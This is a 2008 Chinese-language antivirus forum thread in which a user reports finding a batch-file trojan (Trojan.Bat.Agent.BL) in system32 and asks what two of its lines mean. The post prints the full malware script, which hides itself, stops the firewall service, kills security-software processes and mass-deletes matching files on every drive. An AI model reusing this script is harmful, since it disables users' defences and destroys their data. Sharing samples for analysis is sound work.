微点交流论坛

标题: Dropped:Trojan.Bat.Agent.BL木马 [打印本页]

作者: ljxian 时间: 2008-12-28 16:57 标题: Dropped:Trojan.Bat.Agent.BL木马

本机装有微点家庭版,但有因为其没有病毒扫描功能,也是为了集百家之长,装了360杀毒绿色版V1.0Beta(它可能和别的杀毒软件并存)

微点没有任何提示的情况下, 系统有些反应不大正常(比如开机是速度慢等)又打开360来扫描了一下,又发现了Dropped:Trojan.Bat.Agent.BL
它存在于windows\system32\文件夹中,文件名为cmd.bat(不知道是不是借cmd.exe来伪装), 因为是bat文件可以用记事本打开来看,其内容如下:
@echo off
set s=TASKKILL
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im 360* /f >nul
%s% /im RStray /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\RStray* /f /s /q >nul

看样子我的360杀毒绿色版没有被删除是因为我自定义了文件夹,(看来多动手是有好处的哦)

有两行看得不很懂:
net stop sharedaccess >nul 停止共享吗? 对它有什么好处?
net stop Shadow" "System" "Service 这是什么意思?

作者: ljxian 时间: 2008-12-28 17:09
这个东东我已经搞定，发个贴这里，是记下这个病毒。另外，上次发了个病毒报给微点，几天后微点回信称“dmserver.dll:被感染文件”但让我“请等待微点的更新，感谢您的反馈。”不知道微点有没有根据这个反馈更新啊

作者: gtench 时间: 2008-12-28 17:31
呵呵，我也配了360杀毒，bitdefender还是不错的。

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn